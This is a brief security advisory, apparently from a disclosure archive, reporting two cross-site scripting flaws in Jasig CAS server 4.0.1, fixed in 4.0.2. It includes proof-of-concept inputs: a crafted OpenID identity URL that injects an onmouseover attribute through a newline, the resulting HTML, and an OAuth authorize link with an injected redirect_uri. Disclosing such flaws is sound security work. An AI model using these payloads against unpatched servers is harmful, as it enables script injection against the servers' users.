Home / os / winmobile

Jasig CAS 4.0.1 Cross Site Scripting

Posted on 22 September 2015

Jasig CAS server version 4.0.1 is prone to xss vulnerabilities Timeline: 20.02.2015 - Vendor notified 11.05.2015 - Patches released 21.09.2015 - Bugtraq disclosure Vulnerable version: 4.0.1 Fixed version: 4.0.2 Vulnerabilities details: 1) XSS in OpenID server Obtain method: Paste thi url https://oauth.example.com/cas/openid/username"[new line]onmouseover="jscode in OpenID client and try to log in. space char is not allowed, you can use new line Example redirection link https://oauth.example.com/cas/login?openid.assoc_handle=1422619970824-0&openid.ax.mode=fetch_request&openid.ax.required=email&openid.ax.type.email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.identity=https%3A%2F%2Foauth.example.com%2Fcas%2Fopenid%2Fusername%22&openid.mode=checkid_setup&openid.return_to=https%3A%2F%2Fclien.example.com%2Faccount%2Fsignin%2Fcomplete%2F%3Fnext%3D%252F%26janrain_nonce%3D2015-09-21T11%253A15%253A10ZiTDjrd%26openid1_claimed_id%3Dhttps%253A%252F%252Foauth.example.com%252Fcas%252Fopenid%252Fusername%2527&openid.trust_root=https%3A%2F%2Fclient.example.com%2F Result <input type="hidden" id="username" name="username" value="username" onmouseover="jscode" /> 2) XSS in OAuth server Example link https://oauth.example.com/cas/oauth2.0/authorize?client_id=<client_id>&redirect_uri="onmouseover=alert(1)%20.trusted-domain.com

 

TOP